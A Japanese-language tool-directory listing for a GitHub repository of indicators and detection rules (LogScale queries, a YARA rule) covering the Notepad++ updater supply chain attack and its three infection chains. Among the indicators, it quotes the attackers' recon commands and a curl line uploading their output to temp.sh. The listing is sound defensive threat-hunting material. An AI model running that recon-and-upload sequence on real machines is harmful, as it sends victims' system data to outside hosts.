Skip to content
KitploitKITPLOIT
ツールブログ
Log in
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
notepadpp-supply-chain-iocs — Notepad++サプライチェーン攻撃(CVE-2025-15556)— Lotus Blossom APT、2025年6月~12月 — に関するIoCと検知ルール。Falcon LogScaleクエリ、YARA/Sigmaルール、MITRE ATT&CKマッピングを含みます。 | Kitploit
ツール/GitHubGitHub/renat0z3r0/notepadpp-supply-chain-iocs
侵害指標 (IOC) 管理脅威フィードとアグリゲーター脆弱性分析フォレンジックマルウェア分析脅威インテリジェンスサプライチェーンセキュリティ学習と教育インシデントレスポンス

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
GitHubrenat0z3r0/notepadpp-supply-chain-iocs

notepadpp-supply-chain-iocs

Notepad++サプライチェーン攻撃(CVE-2025-15556)— Lotus Blossom APT、2025年6月~12月 — に関するIoCと検知ルール。Falcon LogScaleクエリ、YARA/Sigmaルール、MITRE ATT&CKマッピングを含みます。

リポジトリを見る
1207ヶ月前未レビュー

Notepad++ サプライチェーン攻撃 — IoC リポジトリ

CVE-2025-15556 | Lotus Blossom / Raspberry Typhoon | 2025年6月~12月

Last Updated IoC Count License: MIT MITRE ATT&CK


概要

このリポジトリには、2026年2月2日に公開された Notepad++ サプライチェーン攻撃に関連する包括的で統合された侵害指標 (IoC) コレクションが含まれています。

2025年6月から12月にかけて、中国政府が支援する脅威アクターが Notepad++ のホスティングインフラを侵害し、組み込みの更新メカニズム (WinGUp) を乗っ取って、標的としたユーザーにトロイの木馬化されたインストーラを選択的に配信しました。この攻撃は、アップデータ (v8.8.9 以前) における暗号学的検証の欠如を悪用し、カスタムバックドア、Cobalt Strike Beacon、Metasploit ペイロードの配布を可能にしました。

重要事実

CVECVE-2025-15556 — 整合性チェックなしでのコードのダウンロード
脅威アクターLotus Blossom (Bilbug, Raspberry Typhoon, Thrip) / Zirconium (Violet Typhoon)
活動期間2025年6月~2025年12月2日
攻撃ベクトルWinGUp 自動更新機能を介したサプライチェーンの侵害
標的政府機関、通信、金融サービス、IT プロバイダ (フィリピン、ベトナム、エルサルバドル、オーストラリア、東アジア)
マルウェアChrysalis バックドア (カスタム)、Cobalt Strike Beacon、Metasploit Meterpreter
修正バージョンNotepad++ v8.8.9+ (証明書検証) / v8.9.1+ (XMLDSig 検証)

感染チェーン

Kaspersky GReAT は、検知を回避するため約1か月ごとに切り替えられた3つの異なる感染チェーンを特定しました:

チェーン#1 — 2025年7月/8月

GUP.exe → update.exe (NSIS) → ProShow.exe (legitimate) → exploit via "load" file
  → Metasploit downloader → Cobalt Strike Beacon
  • DLL サイドローディングではなく、ProShow ソフトウェアの旧来の脆弱性を悪用
  • 偵察: whoami && tasklist → temp.sh を介して外部送信
  • 作業ディレクトリ: %appdata%\ProShow\

チェーン#2 — 2025年9月/10月

GUP.exe → update.exe (NSIS) → script.exe (Lua interpreter) → alien.ini (compiled Lua)
  → shellcode via EnumWindowStationsW → Metasploit downloader → Cobalt Strike Beacon
  • コンパイル済みシェルコードを実行するために正規の Lua インタプリタを使用
  • 拡張された偵察: whoami && tasklist && systeminfo && netstat -ano
  • 作業ディレクトリ: %appdata%\Adobe\Scripts\

チェーン#3 — 2025年10月

GUP.exe → update.exe (NSIS) → BluetoothService.exe (legitimate) → log.dll (sideloaded)
  → decrypts "BluetoothService" shellcode → Chrysalis backdoor
  • 古典的なDLL サイドローディング手法
  • 組み込みの偵察はなし (チェーン1および2とは異なる)
  • 作業ディレクトリ: %appdata%\Bluetooth\
  • 関連する Cobalt Strike Beacon が C:\ProgramData\USOShared\ で発見
                     ┌─────────────────────────────────────────────────────────┐
                     │              COMPROMISE TIMELINE                        │
                     ├─────────┬─────────┬─────────┬─────────┬─────────┬──────┤
                     │  Jul 25 │  Aug 25 │  Sep 25 │  Oct 25 │  Nov 25 │Dec 25│
                     ├─────────┴─────────┴─────────┴─────────┴─────────┴──────┤
  Chain #1 (ProShow) │████████████████████                                    │
  Chain #2 (Lua)     │                    █████████████████████████████        │
  Chain #3 (DLL SL)  │                              ██████████████            │
  Infra access       │████████████████████████████████████████████████████████│
                     └────────────────────────────────────────────────────────┘

リポジトリの内容

ファイル説明
notepadpp_supply_chain_iocs.csvMITRE ATT&CK マッピング付きの IoC 完全データセット (105件の指標)

CSV スキーマ

列説明
ioc_typeタイプ: ip、domain、url、sha1、sha256、filepath、filename、useragent、behavior、cve、attribution、compromise_window
ioc_value指標の値
chain感染チェーン (1、2、3、1/2、2/3、all、n/a)
contextIoC が表す内容の説明
sourceインテリジェンスソース (Kaspersky、Rapid7、CrowdStrike、Tenable、Kevin Beaumont)
risk深刻度 (CRITICAL、HIGH、MEDIUM、LOW、INFO)
mitre_techniqueMITRE ATT&CK テクニック ID

検出と脅威ハンティング

優先指標 (ここから開始)

動作ベース — IoC に依存せず、最も価値が高い:

  • gup.exe が正規の署名済み Notepad++ インストーラ以外の子プロセスを起動する
  • gup.exe が notepad-plus-plus.org、github.com、release-assets.githubusercontent.com 以外のドメイン/IP に接続する
  • ディレクトリの作成: %appdata%\ProShow\、%appdata%\Adobe\Scripts\、%appdata%\Bluetooth\
  • %localappdata%\Temp\ns.tmp\ の作成 (NSIS ランタイム — 全チェーンに存在)

ネットワーク — 高信頼度:

  • cdncheck.it.com、safe-dns.it.com、self-dns.it.com、api.skycloudcenter.com、api.wiresguard.com の DNS 解決
  • temp.sh (51.91.79.17) への接続 — 特に curl によるファイルアップロードを伴うもの
  • User-Agent ヘッダーに temp.sh URL が埋め込まれた HTTP リクエスト
  • 45.76.155.202、45.32.144.255、95.179.213.0、45.77.31.210 への送信接続

偵察コマンド (侵害後):

cmd /c whoami&&tasklist > 1.txt
cmd /c "whoami&&tasklist&&systeminfo&&netstat -ano" > a.txt
curl -F "[email protected]" -s https://temp.sh/upload

CrowdStrike Falcon LogScale クエリ

動作: GUP.exe の子プロセスハンティング
#event_simpleName=ProcessRollup2 event_platform=Win ParentBaseFileName="gup.exe"
| FilePath=/\\Device\\HarddiskVolume\d+(?<shortFilePath>.+$)/
| groupBy([FileName, SHA256HashData, shortFilePath, CommandLine])
プロセス・ネットワーク・DNS イベントにわたるマルチ IoC ハンティング
#event_simpleName=/(ProcessRollup2|NetworkConnectIP4|DnsRequest)/ event_platform=Win
| case {
    // Malicious IPs
    RemoteAddressIP4=/(95\.179\.213\.0|61\.4\.102\.97|59\.110\.7\.32|124\.222\.137\.114|45\.76\.155\.202|45\.32\.144\.255|45\.77\.31\.210)/
        | iocType := "Malicious IP" | iocValue := RemoteAddressIP4 | riskScore := "HIGH";
    // Malicious Domains
    DomainName=/(api\.skycloudcenter\.com|api\.wiresguard\.com|cdncheck\.it\.com|safe-dns\.it\.com|self-dns\.it\.com|temp\.sh)/i
        | iocType := "Malicious Domain" | iocValue := DomainName | riskScore := "HIGH";
    // Suspicious filenames
    ImageFileName=/\\(BluetoothService|admin|system|loader1|loader2|s047t5g|ConsoleApplication2|3yzr31vk|uffhxpSy)\.exe$/i
        | iocType := "Suspicious Filename" | iocValue := ImageFileName | riskScore := "MEDIUM";
    // Suspicious DLLs
    ImageFileName=/\\(log\.dll|libtcc\.dll)$/i
        | iocType := "Suspicious DLL" | iocValue := ImageFileName | riskScore := "MEDIUM";
    // Chain-specific artifacts
    ImageFileName=/\\(alien\.ini|load)$/i
        | iocType := "Chain Artifact" | iocValue := ImageFileName | riskScore := "HIGH";
    * | iocType := null;
}
| iocType=*
| ImageFileName=/\\(?<FileName>[^\\]+)$/
| table([riskScore, iocType, iocValue, @timestamp, aid, ComputerName, FileName, ImageFileName, CommandLine, SHA256HashData, RemoteAddressIP4, DomainName], limit=5000)
NSIS インストーラの検出 (全チェーン)
#event_simpleName=DirectoryCreate event_platform=Win
| FilePath=/\\ns\.tmp$/i
| FilePath=/\\Temp\\ns\.tmp$/i
| groupBy([aid, ComputerName, FilePath, ContextTimeStamp], limit=5000)

YARA ルール (NSIS + 偵察パターン)

悪意のある NSIS アップデータの YARA ルール
rule Notepadpp_SupplyChain_MaliciousUpdater {
    meta:
        description = "Detects malicious NSIS installers from Notepad++ supply chain attack"
        author = "Renato Z3r0 ed i miei sorcini"
        date = "2026-02"
        reference = "https://securelist.com/notepad-supply-chain-attack/118708/"
        tlp = "WHITE"
        
    strings:
        $nsis = "Nullsoft.NSIS" ascii
        $recon1 = "whoami" ascii nocase
        $recon2 = "tasklist" ascii nocase
        $recon3 = "systeminfo" ascii nocase
        $recon4 = "netstat -ano" ascii nocase
        $exfil = "temp.sh/upload" ascii nocase
        $curl = "curl" ascii nocase
        $dir1 = "\\ProShow\\" ascii nocase
        $dir2 = "\\Adobe\\Scripts\\" ascii nocase
        $dir3 = "\\Bluetooth\\" ascii nocase
        
    condition:
        uint16(0) == 0x5A4D and
        $nsis and
        (2 of ($recon*) or $exfil or ($curl and 1 of ($recon*))) and
        1 of ($dir*)
}

Sigma ルール

ツールをダウンロード